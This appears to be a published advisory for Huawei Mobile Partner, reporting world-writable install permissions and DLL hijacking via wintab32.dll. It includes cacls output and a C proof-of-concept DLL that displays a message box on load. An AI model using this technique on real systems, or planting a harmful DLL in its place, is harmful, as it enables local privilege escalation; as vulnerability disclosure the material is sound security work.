Huawei Mobile Partner DLL Hijacking

Risk: Medium
Local: Yes
Remote: No

# Title: Huawei Mobile Partner Multiple Vulnerabilities # Version: # Tested on: Windows XP SP2 en # Vendor: # Software-Link: # E-Mail: osanda[at] # Author: Osanda Malith Jayathissa # /!\ Author is not responsible for any damage you cause # Use this material for educational purposes only #1| Local Privilege Escalation -------------------------------- - Description ============== Any user in the system can modify the legitimate binary to any kind of malicious executable. The user could also place a malicious wintab32.dll file inside the "Mobile Partner" folder and perform DLL hijacking easily. If an attacker break into a low privilege account he could use this application to escalate his privileges. - Proof of Concept =================== C:\Program Files>cacls "Mobile Partner" C:\Program Files\Mobile Partner BUILTIN\Users:(OI)(IO)F BUILTIN\Users:(CI)F NT SERVICE\TrustedInstaller:(ID)F NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F NT AUTHORITY\SYSTEM:(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Administrators:(OI)(CI)(IO)(ID)F CREATOR OWNER:(OI)(CI)(IO)(ID)F C:\Program Files>cd "Mobile Partner" C:\Program Files\Mobile Partner>cacls "Mobile Partner.exe" C:\Program Files\Mobile Partner\Mobile Partner.exe BUILTIN\Users:F BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F #2| Dll Hijacking Vulnerability (wintab32.dll) ----------------------------------------------- #include <windows.h> BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: owned(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int owned() { MessageBox(0, "Mobile Partner DLL Hijacked\nOsanda Malith", "POC", MB_OK | MB_ICONWARNING); } /*EOF*/


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024,


Back to Top